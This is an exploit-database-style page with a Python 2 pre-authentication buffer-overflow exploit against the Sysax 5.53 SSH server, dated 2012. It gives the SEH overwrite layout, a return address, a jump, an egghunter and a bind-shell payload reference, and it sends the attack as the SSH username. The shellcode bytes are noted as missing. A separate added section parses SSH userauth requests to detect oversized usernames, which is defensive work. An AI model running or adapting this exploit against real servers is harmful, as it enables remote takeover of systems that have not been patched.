Sysax 5.53 – SSH ‘Username’ Remote Buffer Overflow Remote Code Execution (Egghunter)

  • Author: Craig Freyman
    Date: 2012-02-27
  • Category:
  • Source:
```python
#!/usr/bin/python
#Title: Sysax <= 5.53 SSH Username BoF Pre Auth RCE (Egghunter)
#Author: Craig Freyman (@cd1zz)
#OS Tested: XP SP3 32bit, 2003 Server SP2 (No DEP)
#Software Versions Tested: 5.53, 5.52, 5.50
#Date Discovered: February 22, 2012
#Vendor Contacted: February 23, 2012
#Vendor Response: February 27, 2012
#Vendor Fix: Sysax 5.55
#Detailed Exploit Description:

# Python 2 script; requires the paramiko SSH library.
import paramiko, os, sys

if len(sys.argv) != 3:
    print "[+] Usage: ./filename <Target IP> <Port>"
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])

# Egghunter stub that scans memory for the "DNWP" tag and jumps to the
# shellcode behind it. The stub's bytes are not present in this copy of the listing.
egghunter = (
    ""
)

# msfpayloadwindows/shell_bind_tcp LPORT=4444 R | msfencode -e -e x86/alpha_mixed X
# Egg tag followed by the encoded bind shell; the encoded bytes are not present in this copy.
shell = (
    "DNWPDNWP"
)

padding1 = "\x90" * 50
padding2 = "\x90" * 50
nseh = "\x90\x90\xeb\x80"   # nSEH: short backward jump (jmp -0x80) into the NOP sled before the egghunter
seh = "\x69\x26\x40\x00"    # 00402669 POP POP RET in sysaxservd.exe
junk = "A" * (9204 - len(egghunter + padding1 + padding2 + shell))
buff = junk + shell + padding1 + egghunter + padding2 + nseh + seh

print "============================================================================"
print " Sysax <= 5.53 SSH Username BoF Pre Auth RCE"
print "by cd1zz"
print " "
print "============================================================================"

try:
    transport = paramiko.Transport((host, port))
except:
    print "[X] Unable to connect to " + host + " on port " + str(port)
    sys.exit(1)

print "[+] Launching exploit against " + host + " on port " + str(port)
# The oversized username is delivered in the pre-auth SSH_MSG_USERAUTH_REQUEST.
transport.connect(username = buff, password = "pwnag3")
print "[+] Done!"
```
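The overflow above is triggered by the username field of a pre-authentication SSH_MSG_USERAUTH_REQUEST (RFC 4252, message number 50). The following is an added defender-side example, not part of the original listing: it parses the decrypted userauth payload and flags a username longer than an assumed threshold, which is how a server-side hook or honeypot could detect the 9204-byte username this exploit sends. The message format is from the RFC; the threshold and the sample packets are constructed here.

```python
import struct

# SSH2 message number for SSH_MSG_USERAUTH_REQUEST (RFC 4252, section 5).
SSH_MSG_USERAUTH_REQUEST = 50

# Assumed alert threshold for this check; legitimate usernames are far shorter.
MAX_SANE_USERNAME = 256


def _read_string(buf, off):
    """Decode one SSH 'string' (uint32 big-endian length + bytes) at offset off."""
    if off + 4 > len(buf):
        raise ValueError("truncated length field")
    (n,) = struct.unpack(">I", buf[off:off + 4])
    off += 4
    if off + n > len(buf):
        raise ValueError("string runs past end of packet")
    return buf[off:off + n], off + n


def parse_userauth_request(payload):
    """Return (username, service, method) from a decrypted userauth payload."""
    if not payload or payload[0] != SSH_MSG_USERAUTH_REQUEST:
        raise ValueError("not an SSH_MSG_USERAUTH_REQUEST")
    user, off = _read_string(payload, 1)
    service, off = _read_string(payload, off)
    method, off = _read_string(payload, off)
    return user, service, method


def oversized_username(payload, limit=MAX_SANE_USERNAME):
    """True when the username exceeds limit bytes, the condition the Sysax
    overflow relies on (the exploit's buffer is 9204 bytes)."""
    user, _, _ = parse_userauth_request(payload)
    return len(user) > limit


def build_userauth_request(user, service=b"ssh-connection", method=b"none"):
    """Constructed sample packet builder, used only to exercise the parser offline."""
    def s(b):
        return struct.pack(">I", len(b)) + b
    return bytes([SSH_MSG_USERAUTH_REQUEST]) + s(user) + s(service) + s(method)


if __name__ == "__main__":
    normal = build_userauth_request(b"alice")
    attack = build_userauth_request(b"A" * 9204)   # length used by the exploit
    print("normal flagged:", oversized_username(normal))   # False
    print("attack flagged:", oversized_username(attack))   # True
```

Because userauth messages travel inside the encrypted SSH transport, this check applies to the decrypted payload on the server side (or in a honeypot), not to raw packet captures.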